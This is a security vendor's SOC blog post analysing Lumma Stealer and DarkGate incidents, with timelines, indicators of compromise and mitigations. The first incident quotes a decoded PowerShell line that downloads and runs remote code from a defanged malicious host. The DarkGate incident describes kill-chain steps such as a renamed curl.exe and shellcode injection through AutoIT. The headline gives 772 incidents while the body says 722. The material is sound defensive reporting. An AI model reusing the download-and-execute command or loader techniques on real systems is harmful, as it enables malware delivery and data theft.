SOC Insights: Lumma Stealer and DarkGate Malware spanning over 772 incidents  

Between October 23-30, 2024, Blackpoint’s Security Operations Center (SOC) responded to 722 total incidents across on-premises, Microsoft 365, and Google Workspace protected environments. These incidents involved the likely threat actor use of:

• Potential Lumma Stealer deployment.
• Potential DarkGate malware deployment.

In this blog, we’ll dive into the details of three select incidents, why they matter for our partners, and possible mitigations using your existing tech stack alongside Blackpoint Cyber’s managed services.

Topline Takeaways

• Industry target: Technology and Healthcare
• Attacker methods:
  • Likely Lumma Stealer
  • .zip files as payload
  • Encoded PowerShell script
• Recommended mitigations:
  • Implement behavior-based monitoring.
  • Require the use of secure password managers.

Incident Timeline for 2024-10-26 and 2024-10-30

On October 26, 2024, Blackpoint’s MDR technology alerted to encoded PowerShell being executed from a user account of a Technology partner. Blackpoint’s Active SOC isolated the impacted machine to prevent further malicious activity.

Initial investigation identified that the encoded PowerShell decoded to the following: “iex (iwr hxxps[://]iilp[.]b-cdn[.]net/kolo26.txt -UseBasicParsing).Content”.

Blackpoint’s Advanced Pursuit Group (APG) conducted further analysis and identified that this PowerShell calls out to the URL to grab the file “kolo26.txt” and executes it. The URL was found to be holding malicious code that calls upon five different variables to download a .zip file, 1shmkv.zip, and saves it as “pg1.zip” located in the temp directory. The script then unzips the file and executes the binary ashampo.exe.

On October 30, 2024, Blackpoint’s MDR technology alerted to a file, “updater.exe”, located in temp folder within two obfuscated folders on a host of a Healthcare partner. Blackpoint’s SOC isolated the impacted device to prevent further malicious activity.

Initial investigation identified that the threat actor utilized forfiles.exe, a legitimate Windows binary, to remotely execute a remote resource. The threat actor attempted to execute a file, “Pantok”, if “expl*re?.exe” existed within C:\Windows.

Additional analysis identified that the file Pantok was hosted at hxxps[://]cdn-defac13[.]techresource[.]shop/api/reg/Pantok. The file is a previously reported malicious version of cleanmgr.dll. The hash of this file, e2b6e854a400d716e599867276b0cc4ab1dc6ae927cc19db7fde3455cb49dcb6, has been previously attributed to a known downloader that has been used to deploy the Lumma Stealer malware.

More About Lumma Stealer

Lumma Stealer is a malware-as-a-service (MaaS) that has been advertised on cybercriminal forums since at least 2022. The malware is capable of stealing valuable information, including cryptocurrency wallets, browser extensions, MFA instances, and more.

Lumma Stealer is offered for sale on multiple cybercriminal forums, which makes post-incident attribution more difficult. Information stealers are an attractive option for cybercriminals due to the ability to use and/or monetize the information stolen.

APG Threat Analysis for Lumma Stealer

Blackpoint’s APG assesses that threat actors will likely continue to deploy information stealer malware to organizations to gather sensitive information over the next 12 months.

This assessment is based on internal Blackpoint observed attacks, such as incidents on August 15, 2024, involving an Industrials partner.

Additionally, the assessment is support by external reports of incidents that involve the use of Lumma Stealer, such as a reported campaign involving the use of fake CAPTCHA verification to trick users into deploying the Lumma Stealer payload.

Mitigations

• Implement behavior-based monitoring to detect unusual activity patterns, such as suspicious processes attempting to make unauthorized network connections.
• Require the use of secure password managers to make accessing passwords by threat actors more difficult.

Topline Takeaways

• Industry target: Healthcare
• Attacker methods:
  • Fake .pdf for social engineering
  • Renamed curl.exe
  • AutoIT
• Recommended mitigations:
  • Employee security training.
  • Scripting language controls.
  • Require the use of multi-factor authentication (MFA).

Incident Timeline for 2024-10-29

Blackpoint’s MDR technology alerted to the execution of a JavaScript file, s-boyle-95453.js, on a host of a Healthcare partner. Blackpoint’s SOC isolated the impacted device to prevent further malicious activity and prevent the deployment of a malware payload; however, based on the observed behaviors, it is likely the threat actor had tried to deploy the DarkGate malware.

Initial investigation revealed that the first aspect of the malware’s kill chain was copying C:\Windows\System32\curl.exe to C:\Users\$username\AppData\Local\Temp\SSDZSHQJidoxdNKHDrvc.exe. Then curl was used to download a file, YhFRGtlFJRkn.pdf, from hxxps[://]dbs5.pwods[.]com/download/pdf. This was likely a fake .pdf used to social engineer the user into thinking that they accessed a legitimate file and did not execute a malicious loader.

Further investigation revealed that Autoit3 executed a malicious script located in an obfuscated folder. The script added a Registry value titled “aafecbg”. The AutoIT script injected the value of the Registry Key, which injected shellcode into MicrosoftEdgeUpdateCore.exe. The injection led to the subsequent callout to the threat actor’s-controlled infrastructure.

Blackpoint’s SOC took swift and aggressive action and isolated the device prior to the malware being executed. However, Logpoint security researchers have previously reported an incident that appears to follow a similar kill chain to this incident, indicating this threat actor had likely attempted to deploy DarkGate.

More About DarkGate

DarkGate malware is a Malware-as-a-Service (MaaS) that has been sold on cybercriminal marketplaces since 2017. DarkGate allows threat actors to perform a number of malicious activities, including keylogging, information theft, deploy additional malware, and gain persistence on a compromised network.

Threat actors likely find DarkGate an attractive option due to the wide range of capabilities of the tool and the ability to purchase the malware for a single day use, a month of use, or a year of use. The ability to purchase the malware likely results in many threat actors using it, which can make post-incident attribution difficult.

APG Threat Analysis for DarkGate

APG assesses threat actors will continue to target organizations with remote access trojans (RATs), like DarkGate, over the next 12 months.

This assessment is based on previously Blackpoint-observed incidents, such as an April 04, 2024, incident involving a Consumer Cyclicals partner.

The assessment is further supported by external reporting of threat actors using DarkGate malware, including reports of a DarkGate malware campaign reported that appears to follow a similar kill chain to the incident observed by Blackpoint’s SOC.

Mitigations

• Create and implement employee security training: DarkGate is often delivered via social engineering attacks; employees should be aware of how to identify potential social engineering tactics; how and when to report to an incident response authority.
• Minimize the use of – or implement strict controls on – the use of scripting languages, as threat actors rely on scripting languages to deploy malware and conduct other malicious activities.
• Require the use of MFA for all user accounts to add an extra layer of security, which can make it more difficult for threat actors to compromise user accounts.

These incidents underscore the evolving tactics of threat actors and highlight the importance of layered defenses. By leveraging Blackpoint’s MDR technology and following these mitigation strategies, you can bolster your organization’s defenses against these types of attacks. Reach out to Blackpoint’s SOC team for tailored recommendations on how to enhance your cybersecurity posture.